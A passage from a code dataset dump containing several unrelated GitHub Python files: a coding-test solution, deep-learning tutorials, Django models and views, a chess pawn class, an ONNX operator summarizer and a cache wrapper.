(4).py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43559542538","text":"# \"anta....tica\" is always included -> the five letters a, n, t, i, c must be known no matter what\n\n# number of words (N) is at most 50 -> 2^50\n# K is between 0 and 26 -> if it is less than 5 the answer is always 0\n# removing all five letters -> the range shrinks to between 0 and 21\n# -> the number of combinations is at most 21C10 = 352716 -> feasible\n# 352716 * 50 = about 17.63 million\n\n# pick only a few letters from the whole set -> check whether each word fits inside this selection\n\n\n# Time limit exceeded... 
sigh -> is there a way to do this without using itertools..?\n\n\nimport sys\nfrom itertools import combinations\n\n\nnums = sys.stdin.readline().split(\" \")\nword_num = int(nums[0])\nletter_num = int(nums[1])\n\nwords = [\"\"]*(word_num)\ntotal_word = \"\"\n\nfor i in range(word_num):\n word = sys.stdin.readline().replace(\"\\n\", \"\").replace(\"a\", \"\").replace(\"n\", \"\").replace(\"t\", \"\").replace(\"i\", \"\").replace(\"c\", \"\")\n words[i] = words[i] + word\n total_word = total_word + word\n\n\nprint(words)\n\ndef max_word_count(total_word, words, letter_num):\n\n # print(letter_num)\n\n if (letter_num < 5):\n return 0\n\n letter_set = set(total_word) # all remaining letters\n\n word_counts = []\n\n\n\n for combi in combinations(letter_set, letter_num-5):\n\n count = 0\n\n for word in words:\n # print(combi)\n # print(word)\n\n\n if (set(word) & set(combi) == set(word)):\n count += 1\n\n\n word_counts.append(count)\n\n return max(word_counts)\n\n\nprint(max_word_count(total_word, words, letter_num))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Qkite/coding-test-study","sub_path":"pccp_practice/가르침.py","file_name":"가르침.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34687352215","text":"# chao\n# Time: 2023/11/28 15:16\n# A concise implementation of softmax regression\n\nimport torch\nfrom torch import nn\nfrom d2l import torch as d2l\n\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n\n# Define the network model; add a Flatten layer before the linear layer to reshape the network input\nnet = nn.Sequential(\n nn.Flatten(),\n nn.Linear(784, 10)\n)\n\n# Define the weight initialization method\ndef init_weights(m):\n '''\n\n :param m: m represents a module\n :return:\n '''\n if type(m) == nn.Linear: # if module m is of type Linear, initialize its weight\n nn.init.normal_(m.weight, mean=0, std=0.01) # nn's weight initializer; takes the tensor to initialize, the mean (default 0) and the standard deviation (default 1.0)\n\nnet.apply(init_weights)\n\n# Define the cross-entropy loss function\nloss = nn.CrossEntropyLoss(reduction='none') # reduction specifies how the loss is aggregated; 'none' returns the per-sample cross-entropy loss\n\n# Define the optimization algorithm\ntrainer = torch.optim.SGD(net.parameters(), lr=0.1)\n\n# Training\nnum_epochs = 3\n# the method is defined in d2l, but it cannot be found when called\n# d2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, trainer)\n","repo_name":"Oceandkb/DLdemo","sub_path":"learning/Regression/softmax_regression_simple.py","file_name":"softmax_regression_simple.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16490225937","text":"from django.db.models import (\n CASCADE,\n BooleanField,\n ForeignKey,\n)\nfrom utils.models import (\n ProjectModel,\n)\n\n\nclass Vote(ProjectModel):\n \"\"\"\n A user's vote mark\n \"\"\"\n\n is_like = BooleanField('Положительная отметка пользователя', default=False)\n\n user = ForeignKey('users.CustomUser', verbose_name='Пользователь', on_delete=CASCADE)\n recipe = ForeignKey('recipes.Recipe', verbose_name='Рецепт', on_delete=CASCADE)\n\n class Meta:\n db_table = 'recommendations_vote'\n verbose_name = 'Отметка пользователя'\n verbose_name_plural = 'Отметки пользователей'\n","repo_name":"sandanilenko/peerocks","sub_path":"peerocks/peerocks/apps/services/recommendations/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413385339","text":"import d2lzh as d2l\nfrom mxnet import autograd, nd\ndef xyplot(x_vals, y_vals, name):\n d2l.set_figsize(figsize = (5, 2.5));\n d2l.plt.plot(x_vals.asnumpy(), y_vals.asnumpy());\n d2l.plt.xlabel(\"x\");\n 
d2l.plt.ylabel(name + \"(x)\");\n d2l.plt.show()\n\nx = nd.arange(-8.0, 8.0, 0.1);\nx.attach_grad()\nwith autograd.record():\n y = x.relu();\nxyplot(x, y, \"ReLU\")\n","repo_name":"duanbing/DLNotes","sub_path":"example/mxnet/3.8.2_relu.py","file_name":"3.8.2_relu.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21820764803","text":"#!/usr/bin/env python\n# -*- coding: utf-8\n\nfrom goobi.goobi_step import Step\nimport tools.tools as tools\nimport tools.limb as limb_tools\nimport os, time\n\nclass WaitForLimb( Step ):\n\n def setup(self):\n self.name = 'Vent på output-filer fra LIMB'\n self.config_main_section = 'limb_output'\n self.folder_structure_section = 'process_folder_structure'\n self.valid_exts_section = 'valid_file_exts'\n self.essential_config_sections.update([self.folder_structure_section, \n self.valid_exts_section] )\n self.essential_commandlines = {\n 'process_id' : 'number',\n 'process_path' : 'folder',\n 'auto_report_problem' : 'string',\n 'step_id' : 'number'\n }\n def getVariables(self):\n '''\n We need the limb_output folder,\n the location of the toc file\n Throws error if any directories are missing\n or if our retry vals are not numbers\n '''\n process_title = self.command_line.process_title\n limb = self.getConfigItem('limb_output')\n alto = self.getConfigItem('alto')\n toc = self.getConfigItem('toc')\n pdf = self.getConfigItem('pdf')\n \n # join paths to create absolute paths\n self.limb_dir = os.path.join(limb, process_title)\n self.alto_dir = os.path.join(self.limb_dir, alto)\n self.toc_dir = os.path.join(self.limb_dir, toc)\n self.pdf_input_dir = os.path.join(self.limb_dir, pdf)\n \n # Set destination for paths\n self.goobi_altos = os.path.join(self.command_line.process_path, \n self.getConfigItem('metadata_alto_path', None, 'process_folder_structure'))\n self.goobi_toc = os.path.join(self.command_line.process_path, \n self.getConfigItem('metadata_toc_path', None, 'process_folder_structure'))\n self.goobi_pdf = os.path.join(self.command_line.process_path, \n self.getConfigItem('doc_limbpdf_path', None, 'process_folder_structure'))\n self.valid_exts = self.getConfigItem('valid_file_exts',None, self.valid_exts_section).split(';')\n # Get path for input-files in process folder\n process_path = self.command_line.process_path\n input_files = self.getConfigItem('img_master_path',\n section= self.folder_structure_section) \n self.input_files = os.path.join(process_path,input_files)\n \n # Get retry number and retry-wait time\n self.retry_num = int(self.getConfigItem('retry_num'))\n self.retry_wait = int(self.getConfigItem('retry_wait'))\n \n # Set flag for ignore if files already have been copied to goobi\n self.ignore_goobi_folder = self.getSetting('ignore_goobi_folder', bool, default=True)\n \n def step(self):\n '''\n This script's role is to wait until\n LIMB processing is complete before finishing.\n In the event of a timeout, it reports back to \n previous step before exiting.\n '''\n error = None\n retry_counter = 0\n try:\n self.getVariables()\n # First check if files already have been copied to goobi\n if (not self.ignore_goobi_folder and \n limb_tools.alreadyMoved(self.goobi_toc,self.goobi_pdf,\n self.input_files,self.goobi_altos,\n self.valid_exts)):\n return error\n # keep on retrying for the given number of attempts\n while retry_counter < self.retry_num:\n \n if self.limbIsReady():\n msg = ('LIMB output is ready - exiting.')\n 
self.debug_message(msg)\n return None # this is the only successful exit possible\n else:\n # if they haven't arrived, sit and wait for a while\n msg = ('LIMB output not ready - sleeping for {0} seconds...')\n msg = msg.format(self.retry_wait)\n self.debug_message(msg)\n retry_counter += 1\n time.sleep(self.retry_wait)\n except IOError as e:\n # if we get an IO error we need to crash\n error = ('Error reading from directory {0}')\n error = error.format(e.strerror)\n return error\n except ValueError as e:\n # caused by conversion of non-numeric strings in config to nums\n error = \"Invalid config data supplied, error: {0}\"\n error = error.format(e)\n return error\n # if we've gotten this far, we've timed out and need to go back to the previous step\n return \"Timed out waiting for LIMB output.\"\n\n\n \n def limbIsReady(self):\n '''\n Check to see if LIMB is finished\n return boolean\n '''\n try: \n # raises error if one of our directories is missing\n tools.ensureDirsExist(self.limb_dir, self.alto_dir, \\\n self.toc_dir, self.pdf_input_dir, self.input_files)\n except IOError as e:\n msg = ('One of the output folders from LIMB is not yet created.'\n ' Waiting for LIMB to be ready. Error: {0}')\n msg = msg.format(e.strerror)\n self.debug_message(msg)\n return False\n if limb_tools.tocExists(self.toc_dir):\n return True\n if limb_tools.altoFileCountMatches(self.alto_dir, self.input_files):\n return True\n return False\n\nif __name__ == '__main__':\n \n WaitForLimb( ).begin()\n","repo_name":"kb-dk/goobi-scripts","sub_path":"kb/wait_for_limb.py","file_name":"wait_for_limb.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2094456838","text":"from .. values import *\nfrom .piece import *\nfrom .. 
board import *\n\n\nclass cPawn(cPiece):\n DIRS = { 'north' : 1,\n 'south' : 2,\n 'north-east' : 5,\n 'south-west' : 6,\n 'north-west' : 7,\n 'south-east' : 8,\n '2north' : 9,\n '2south' : 10,\n 'valid' : 13,\n 'undefined' : 14 }\n REVERSE_DIRS = { DIRS['north'] : DIRS['south'],\n DIRS['south'] : DIRS['north'],\n DIRS['north-east'] : DIRS['south-west'],\n DIRS['south-west'] : DIRS['north-east'],\n DIRS['north-west'] : DIRS['south-east'],\n DIRS['south-east'] : DIRS['north-west'],\n DIRS['2north'] : DIRS['2south'],\n DIRS['2south'] : DIRS['2north'],\n DIRS['valid'] : DIRS['valid'],\n DIRS['undefined'] : DIRS['undefined'] }\n STEP_1N_X = 0\n STEP_1N_Y = 1\n STEP_2N_X = 0\n STEP_2N_Y = 2\n STEP_1N1E_X = 1\n STEP_1N1E_Y = 1\n STEP_1N1W_X = -1\n STEP_1N1W_Y = 1\n STEP_1S_X = 0\n STEP_1S_Y = -1\n STEP_2S_X = 0\n STEP_2S_Y = -2\n STEP_1S1E_X = 1\n STEP_1S1E_Y = -1\n STEP_1S1W_X = -1\n STEP_1S1W_Y = -1\n blk = 0\n wRk = 3\n wKn = 4\n wBp = 5\n wQu = 6\n bRk = 11\n bKn = 12\n bBp = 13\n bQu = 14 \n MAXCNT = 1\n\n def __init__(self, match, xpos, ypos):\n super().__init__(match, xpos, ypos)\n if(self.color == COLORS['white']):\n self.STEPS = [ [1, 1], [-1, 1] ]\n self.BACK_STEPS = [ [1, -1], [-1, -1] ]\n if(self.ypos < 6):\n self.GEN_STEPS = [ [[0, 1, PIECES['blk']]], [[0, 2, PIECES['blk']]], [[1, 1, PIECES['blk']]], [[-1, 1, PIECES['blk']]] ]\n else:\n self.GEN_STEPS = [ [[0, 1, PIECES['wQu']], [0, 1, PIECES['wRk']], [0, 1, PIECES['wBp']], [0, 1, PIECES['wKn']]],\n [[1, 1, PIECES['wQu']], [1, 1, PIECES['wRk']], [1, 1, PIECES['wBp']], [1, 1, PIECES['wKn']]],\n [[-1, 1, PIECES['wQu']], [-1, 1, PIECES['wRk']], [-1, 1, PIECES['wBp']], [-1, 1, PIECES['wKn']]] ]\n else:\n self.STEPS = [ [1, -1], [-1, -1] ]\n self.BACK_STEPS = [ [1, 1], [-1, 1] ]\n if(self.ypos > 1):\n self.GEN_STEPS = [ [[0, -1, PIECES['blk']]], [[0, -2, PIECES['blk']]], [[-1, -1, PIECES['blk']]], [[1, -1, PIECES['blk']]] ]\n else:\n self.GEN_STEPS = [ [[0, -1, PIECES['bQu']], [0, -1, PIECES['bRk']], [0, -1, PIECES['bBp']], [0, -1, PIECES['bKn']]],\n [[1, -1, PIECES['bQu']], [1, -1, PIECES['bRk']], [1, -1, PIECES['bBp']], [1, -1, PIECES['bKn']]],\n [[-1, -1, PIECES['bQu']], [-1, -1, PIECES['bRk']], [-1, -1, PIECES['bBp']], [-1, -1, PIECES['bKn']]] ]\n\n @classmethod\n def dir_for_move(cls, srcx, srcy, dstx, dsty):\n step_x = dstx - srcx\n step_y = dsty - srcy\n if(step_x == cls.STEP_1N_X and step_y == cls.STEP_1N_Y):\n return cls.DIRS['north']\n elif(step_x == cls.STEP_2N_X and step_y == cls.STEP_2N_Y and \n srcy == cBoard.COORD['2']):\n return cls.DIRS['2north']\n elif(step_x == cls.STEP_1N1E_X and step_y == cls.STEP_1N1E_Y):\n return cls.DIRS['north-east']\n elif(step_x == cls.STEP_1N1W_X and step_y == cls.STEP_1N1W_Y):\n return cls.DIRS['north-west']\n elif(step_x == cls.STEP_1S_X and step_y == cls.STEP_1S_Y):\n return cls.DIRS['south']\n elif(step_x == cls.STEP_2S_X and step_y == cls.STEP_2S_Y and \n srcy == cBoard.COORD['7']):\n return cls.DIRS['2south']\n elif(step_x == cls.STEP_1S1E_X and step_y == cls.STEP_1S1E_Y):\n return cls.DIRS['south-east']\n elif(step_x == cls.STEP_1S1W_X and step_y == cls.STEP_1S1W_Y):\n return cls.DIRS['south-west']\n else:\n return cls.DIRS['undefined']\n\n #step_for_dir(direction):\n # not used for pawn\n\n def is_trapped(self):\n return False # pawn cannot be trapped\n\n #is_piece_stuck(self):\n # works with inherited class\n\n #is_move_stuck(self, dstx, dsty)\n # works with inherited class\n\n def is_move_valid(self, dstx, dsty, prom_piece):\n move_dir = self.dir_for_move(self.xpos, self.ypos, dstx, 
dsty)\n if(move_dir == self.DIRS['undefined']):\n return False\n\n pin_dir = self.match.eval_pin_dir(self.xpos, self.ypos)\n\n dstpiece = self.match.readfield(dstx, dsty)\n\n if(self.color == COLORS['white']):\n # check pins\n if(move_dir == self.DIRS['north'] or move_dir == self.DIRS['2north']):\n if(pin_dir != self.DIRS['north'] and pin_dir != self.DIRS['south'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['north-west']):\n if(pin_dir != self.DIRS['north-west'] and pin_dir != self.DIRS['south-east'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['north-east']):\n if(pin_dir != self.DIRS['north-east'] and pin_dir != self.DIRS['south-west'] and pin_dir != self.DIRS['undefined']):\n return False\n else:\n return False\n\n # check fields\n if(move_dir == self.DIRS['north'] and dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['2north']):\n midpiece = self.match.readfield(dstx, self.ypos + self.STEP_1N_Y)\n if(midpiece != PIECES['blk'] or dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['north-west'] or move_dir == self.DIRS['north-east']):\n if(self.match.color_of_piece(dstpiece) != COLORS['black']):\n return self.is_white_ep_move_ok(dstx, dsty)\n\n # check promotion\n if(dsty == 7 and prom_piece != PIECES['wQu'] and \n prom_piece != PIECES['wRk'] and \n prom_piece != PIECES['wBp'] and \n prom_piece != PIECES['wKn']):\n return False\n elif(dsty < 7 and prom_piece != PIECES['blk']):\n return False\n else:\n # check pins\n if(move_dir == self.DIRS['south'] or move_dir == self.DIRS['2south']):\n if(pin_dir != self.DIRS['north'] and pin_dir != self.DIRS['south'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['south-east']):\n if(pin_dir != self.DIRS['north-west'] and pin_dir != self.DIRS['south-east'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['south-west']):\n if(pin_dir != self.DIRS['north-east'] and pin_dir != self.DIRS['south-west'] and pin_dir != self.DIRS['undefined']):\n return False\n else:\n return False\n \n # check fields\n if(move_dir == self.DIRS['south'] and dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['2south']):\n midpiece = self.match.readfield(dstx, self.ypos + self.STEP_1S_Y)\n if(midpiece != PIECES['blk'] or dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['south-east'] or move_dir == self.DIRS['south-west']):\n if(self.match.color_of_piece(dstpiece) != COLORS['white']):\n return self.is_black_ep_move_ok(dstx, dsty)\n\n # check promotion\n if(dsty == 0 and prom_piece != PIECES['bQu'] and \n prom_piece != PIECES['bRk'] and \n prom_piece != PIECES['bBp'] and \n prom_piece != PIECES['bKn']):\n return False\n elif(dsty > 0 and prom_piece != PIECES['blk']):\n return False\n\n return True\n\n def do_move(self, dstx, dsty, prom_piece):\n move = cMove(self.match, \n self.match.movecnt() + 1, \n cMove.TYPES['standard'],\n self.xpos, \n self.ypos, \n dstx, \n dsty, \n None, \n None,\n PIECES['blk'], \n prom_piece, \n self.match.board.fifty_moves_count)\n\n dstpiece = self.match.readfield(move.dstx, move.dsty)\n \n if(prom_piece != PIECES['blk']):\n move.move_type = cMove.TYPES['promotion']\n move.captured_piece = dstpiece\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, prom_piece)\n self.match.score -= (SCORES[prom_piece] - SCORES[self.piece])\n self.match.score += SCORES[dstpiece]\n 
elif(dstpiece == PIECES['blk'] and self.xpos != dstx):\n move.move_type = cMove.TYPES['en_passant']\n move.e_p_fieldx = dstx\n move.e_p_fieldy = self.ypos\n move.captured_piece = self.match.readfield(move.e_p_fieldx, move.e_p_fieldy)\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, self.piece)\n self.match.writefield(move.e_p_fieldx, move.e_p_fieldy, PIECES['blk'])\n self.match.score += SCORES[move.captured_piece]\n else:\n move.captured_piece = dstpiece\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, self.piece)\n self.match.score += SCORES[dstpiece]\n\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n self.match.board.domove_white_movecnt_short_castling_lost(move.srcx, move.srcy, move.count)\n self.match.board.domove_white_movecnt_long_castling_lost(move.srcx, move.srcy, move.count)\n else:\n self.match.board.domove_black_movecnt_short_castling_lost(move.srcx, move.srcy, move.count)\n self.match.board.domove_black_movecnt_long_castling_lost(move.srcx, move.srcy, move.count)\n\n self.match.board.domove_counter(dstpiece)\n self.match.board.domove_fifty_moves_count(self.piece, dstpiece)\n\n self.match.move_list.append(move)\n return move\n\n def undo_move(self, move):\n if(move.move_type == move.TYPES['standard']):\n self.match.writefield(move.srcx, move.srcy, self.piece)\n self.match.writefield(move.dstx, move.dsty, move.captured_piece)\n self.match.score -= SCORES[move.captured_piece]\n elif(move.move_type == move.TYPES['promotion']):\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n origin = PIECES['wPw']\n else:\n origin = PIECES['bPw']\n self.match.writefield(move.srcx, move.srcy, origin)\n self.match.writefield(move.dstx, move.dsty, move.captured_piece)\n self.match.score += (SCORES[move.prom_piece] - SCORES[origin])\n self.match.score -= SCORES[move.captured_piece]\n elif(move.move_type == move.TYPES['en_passant']):\n self.match.writefield(move.srcx, move.srcy, self.piece)\n self.match.writefield(move.dstx, move.dsty, PIECES['blk'])\n self.match.writefield(move.e_p_fieldx, move.e_p_fieldy, move.captured_piece)\n self.match.score -= SCORES[move.captured_piece]\n\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n self.match.board.undomove_white_movecnt_short_castling_lost(move)\n self.match.board.undomove_white_movecnt_long_castling_lost(move)\n else:\n self.match.board.undomove_black_movecnt_short_castling_lost(move)\n self.match.board.undomove_black_movecnt_long_castling_lost(move)\n\n self.match.board.undomove_counter(move)\n self.match.board.undomove_fifty_moves_count(move)\n return move\n\n def is_white_ep_move_ok(self, dstx, dsty):\n if(len(self.match.move_list) == 0):\n return False\n else:\n lastmove = self.match.move_list[-1]\n\n dstpiece = self.match.readfield(dstx, dsty)\n enemy = self.match.readfield(lastmove.dstx, lastmove.dsty)\n if(dstpiece == PIECES['blk'] and enemy == PIECES['bPw']):\n if(lastmove.srcy - lastmove.dsty == 2 and \n lastmove.dsty == self.ypos and \n lastmove.dstx == dstx and \n lastmove.dsty - dsty == -1):\n return True\n return False\n\n def is_black_ep_move_ok(self, dstx, dsty):\n if(len(self.match.move_list) == 0):\n return False\n else:\n lastmove = self.match.move_list[-1]\n\n dstpiece = self.match.readfield(dstx, dsty)\n enemy = self.match.readfield(lastmove.dstx, lastmove.dsty)\n if(dstpiece == PIECES['blk'] and enemy == PIECES['wPw']):\n if(lastmove.srcy - lastmove.dsty == -2 and \n lastmove.dsty == 
self.ypos and \n lastmove.dstx == dstx and \n lastmove.dsty - dsty == 1):\n return True\n return False\n\n #find_attacks_and_supports(self, attacked, supported):\n # works with inherited class\n\n #forks(self):\n # works with inherited class\n\n #defends_fork(self)\n # works with inherited class\n\n #move_defends_fork(self, dstx, dsty)\n # works with inherited class\n\n def move_controles_file(self, dstx, dsty):\n return False\n\n #score_touches(self):\n # works with inherited class\n\n # list_moves(self):\n # works with inherited class\n\n # generate_moves(self):\n # works with inherited class\n\n # generate_priomoves(self):\n # works with inherited class\n\n def is_running(self):\n if(self.color == COLORS['white']):\n stepx = 0\n stepy = 1\n opp_pawn = PIECES['bPw']\n else:\n stepx = 0\n stepy = -1\n opp_pawn = PIECES['wPw']\n for i in range(-1, 2, 1):\n x1 = self.xpos + i\n y1 = self.ypos\n while(True):\n x1, y1 = self.match.search(x1, y1, stepx, stepy)\n if(x1 is not None):\n piece = self.match.readfield(x1, y1)\n if(piece == opp_pawn):\n return False\n else:\n break\n return True\n\n def is_weak(self):\n from .. analyze_helper import list_all_field_touches\n friends, enemies = list_all_field_touches(self.match, self.color, self.xpos, self.ypos)\n if(len(friends) >= len(enemies)):\n return False\n if(self.color == COLORS['white']):\n stepy = -1\n else:\n stepy = 1\n for i in range(2):\n if(i == 0):\n newx = self.xpos + 1\n else:\n newx = self.xpos - 1\n if(self.match.is_inbounds(newx, self.ypos)):\n x1, y1 = self.match.search(newx, self.ypos, newx, stepy)\n if(x1 is not None):\n piece = self.match.readfield(x1, y1)\n if((piece == PIECES['wPw'] or piece == PIECES['bPw']) and\n self.color == self.match.color_of_piece(piece)):\n return False\n return True\n\n# class end\n\n","repo_name":"richardtraindl/immanuel","sub_path":"kate/engine/pieces/pawn.py","file_name":"pawn.py","file_ext":"py","file_size_in_byte":15678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39095164697","text":"import onnx\nfrom onnx import helper, checker\nfrom onnx import TensorProto\nimport re\nimport argparse\n\n#import json\n#from google.protobuf.json_format import MessageToJson\n#from google.protobuf.json_format import Parse\nimport collections\n\ndef printDict(d, key_string, val_string):\n print('{}\\n{} {}\\n{}'.format('*'*10,key_string,val_string, '-'*10))\n for key, val in d.items():\n print('{} {}'.format(key, val))\n print('{}'.format('*'*10))\n\n\n# Matches a pair of brackets which are not part of comments or not part of strings delimited by \"\"\n# Returns\ndef match_brackets(str):\n pairs = {'(': ')',\n '{': '}',\n '[': ']'}\n ignore_delims={'\"':'\"',\n '#':'\\n'}\n q = []\n # { end_pos: (stat_char, start_pos)}\n pos_pair = collections.OrderedDict()\n pos=0\n ignore_char=None\n for c in str:\n if c in ignore_delims.keys() and ignore_char==None:\n ignore_char=c\n elif ignore_char:\n if c == ignore_delims[ignore_char]:\n ignore_char=None\n elif c in pairs.keys():\n entry = (c,pos)\n q.append(entry)\n elif c in pairs.values():\n if not q:\n return (False, None)\n entry = q.pop()\n if c != pairs[entry[0]]:\n print(str[:pos])\n return (False, None)\n pos_pair[pos]=entry\n pos=pos+1\n return (not q, pos_pair)\n\ndef analyze_onnx(model_file):\n model = onnx.load(model_file)\n graph = model.graph\n # Generate a name for all node if they have none.\n nodeIdx = 0\n opDict = collections.OrderedDict()\n for n in graph.node:\n if n.op_type not in 
opDict.keys():\n opDict[n.op_type] = 1\n else:\n opDict[n.op_type] = opDict[n.op_type] + 1\n if n.op_type == 'Loop':\n loop_body = \"#\" + str(n.attribute[0])\n loop_name = n.name.replace(\"\\\\\", \"_\")\n loop_name = loop_name.replace(\"/\", '_')\n match, bracket_dict = match_brackets(loop_body)\n if match and bracket_dict:\n last_brace_pos = list(bracket_dict.keys())[-1]\n first_bracket, start_pos = bracket_dict[last_brace_pos]\n loop_body = loop_body[start_pos:last_brace_pos + 1]\n loop_body = \"graph \" + loop_body\n onnxtxt_file = loop_name + '.onnxtxt'\n onnx_file = loop_name + '.onnx'\n print(\"Writing body for loop onnx operator \" + n.name + \" to file \" + onnx_file + \" .\\n\")\n text_file = open(onnxtxt_file, \"w\")\n _ = text_file.write(loop_body)\n text_file.close()\n import os\n os.system('protoc onnx.proto --encode=onnx.ModelProto < ' + onnxtxt_file + ' > ' + onnx_file)\n analyze_onnx(onnx_file)\n print(model_file)\n printDict(opDict, 'op', 'count')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Create a summary of operators in the input onnx file, dump'\n ' each loop body as an onnx file, and create a summary for each '\n ' such loop body.')\n parser.add_argument(\"input\", help=\"input onnx model\")\n args = parser.parse_args()\n \n analyze_onnx(args.input)\n\n''' \n text_file = open(\"log.txt\", \"r\")\n #read whole file to a string\n data = text_file.read() \n #close file\n text_file.close()\n convert_model = Parse(data, onnx.ModelProto())\n \n print(convert_model)\n \n s = MessageToJson(onnx_model)\n'''\n","repo_name":"saurabh-shandilya/onnx-utils","sub_path":"onnx_summarize.py","file_name":"onnx_summarize.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"5088114758","text":"# coding=UTF-8\n'''\nGlobally manages memcache calls, wrapping django's built-in cache.\nMainly used for small amounts of data.\n'''\nfrom django.core.cache import get_cache\nfrom apps.common.utils.utils_collection import genr_sublist\n\n# TODO: wangqi 20151201 this could be improved into a flyweight pattern, as sketched in the code below\n\n\"\"\"\nclass CacheAdaptar(object):\n\n cache_name_dict = {}\n\n @classmethod\n def get_cache(cls, cache_name):\n pass # stash the corresponding cache into this class's own dict\n\n\n def get(self, key, default = None):\n pass\n\n def set(self, key, timeout):\n pass\n\n def delete(self, key):\n pass\n\n\nweb_cache = CacheAdpter.get_cache('web')\n\n\"\"\"\n\nclass CacheAdpter():\n\n @classmethod\n def get_time_out(cls, timeout, cache):\n if not timeout:\n timeout = cache.default_timeout\n return timeout\n\n @classmethod\n def get(cls, key, cache_name, default = None):\n use_cache = get_cache(cache_name)\n value = use_cache.get(key)\n if value is None:\n return default\n return value\n\n @classmethod\n def set(cls, key, value, cache_name, timeout = 0):\n use_cache = get_cache(cache_name)\n use_cache.set(key, value, cls.get_time_out(timeout, use_cache))\n\n @classmethod\n def get_many(cls, keys, cache_name, default = {}):\n use_cache = get_cache(cache_name)\n value_dict = use_cache.get_many(keys)\n if value_dict is None:\n return default\n return value_dict\n\n @classmethod\n def set_many(cls, keys, cache_name, timeout = 0):\n use_cache = get_cache(cache_name)\n use_cache.set_many(keys, cls.get_time_out(timeout, use_cache))\n\n @classmethod\n def delete(cls, key, cache_name):\n use_cache = get_cache(cache_name)\n use_cache.delete(key)\n\n @classmethod\n def delete_many(cls, keys, cache_name):\n use_cache = get_cache(cache_name)\n for key in keys:\n 
use_cache.delete(key)\n\n\n @classmethod\n def set_large_list(cls, key, value_list, split_size, cache_name, timeout = 0):\n if value_list:\n use_cache = get_cache(cache_name)\n value_map = {}\n\n for index, temp_sublist in enumerate(genr_sublist(value_list, split_size)):\n value_map.update({'%s_%s' % (key, index):temp_sublist})\n\n use_cache.set_many(value_map, timeout) # store the split-up data\n use_cache.set(key, index + 1, timeout) # the N groups it was split into\n return True\n\n @classmethod\n def get_large_list(cls, key, cache_name):\n use_cache = get_cache(cache_name)\n\n value_list = []\n grp_num = use_cache.get(key)\n if grp_num is None:\n return value_list\n\n keys = [key + '_' + str(i) for i in range(grp_num)]\n value_dict = use_cache.get_many(keys)\n if not value_dict:\n return value_list\n else:\n return reduce(list.__add__, value_dict.values())","repo_name":"Florence3546/CRM","sub_path":"apps/common/utils/utils_cacheadpter.py","file_name":"utils_cacheadpter.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37072247083","text":"from django.shortcuts import render\nfrom .apps import WebappConfig\n\n# Create your views here.\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .apps import WebappConfig\nimport numpy as np\n\n\ndef fetch_article_info(dataframe_idx, df):\n info = df.iloc[dataframe_idx]\n meta_dict = dict()\n meta_dict['title'] = info['title']\n meta_dict['description'] = info['description']\n meta_dict['doi'] = info['doi']\n meta_dict['author_count'] = info['author_count']\n meta_dict['author_names'] = info['author_names']\n meta_dict['authkeywords'] = info['authkeywords']\n return meta_dict\n\n\ndef search(self, query, top_k, index, model, df):\n print(index.ntotal)\n query_vector = model.encode(query)\n top_k = index.search(query_vector, top_k)\n top_k_ids = top_k[1].tolist()[0]\n top_k_ids = list(np.unique(top_k_ids))\n results = [self.fetch_article_info(idx, df) for idx in top_k_ids]\n return results\n\n\nclass call_model(APIView):\n def get(self, request):\n if request.method == 'GET':\n # sentence is the query we want to get the prediction for\n params = request.GET.get('query', 'default')\n\n # predict method used to get the prediction\n response = WebappConfig.model.encode([params])\n # response = search(self, query=params, top_k=15, index=WebappConfig.index, model=WebappConfig.model, df=WebappConfig.articles)\n # response = search(self, )\n response = WebappConfig.index.search(response, 15)\n # nice\n # returning JSON response\n return JsonResponse(response.tolist(), safe=False)\n","repo_name":"DavidZhongtai/bert-api","sub_path":"fastbert/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5614173893","text":"import os\r\nimport re\r\n\r\ndef 